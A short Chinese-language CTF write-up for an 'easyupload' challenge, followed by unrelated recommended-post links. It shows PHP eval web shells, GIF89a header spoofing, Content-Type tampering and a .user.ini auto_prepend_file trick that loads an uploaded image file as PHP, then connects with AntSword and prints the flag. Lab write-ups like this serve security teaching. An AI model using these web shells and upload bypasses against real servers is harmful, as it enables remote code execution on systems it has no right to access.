CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
小波小波轩然大波8 小时前
openstack总结
windows·php·openstack
百***78759 小时前
Step-Audio-2 轻量化接入全流程详解
android·java·gpt·php·llama
我叫逢9 小时前
一键去水印实战已上线!心得~
微信小程序·php·去水印
运维行者_11 小时前
OPM 与传统管理工具的区别,在网络修复与自动化运维方面的优势在哪里?
运维·服务器·开发语言·网络·自动化·php·ssl
网安INF13 小时前
SSL/TLS密钥派生机制与安全攻防体系深度解析
网络·安全·网络安全·密码学·ssl
电商API&Tina14 小时前
【电商API接口】关于电商数据采集相关行业
java·python·oracle·django·sqlite·json·php
一岁天才饺子15 小时前
Redis漏洞复现
redis·web安全·网络安全
脆皮瞎16 小时前
内网横向移动 ?
网络安全·php·内网穿透
用户30745969820716 小时前
一文搞懂 PHP 中的 `cURL` 和 `header()`:请求头 vs 响应头
php
百***074516 小时前
Step-Audio-2 API 中转调用解决方案:2025 年版
开发语言·php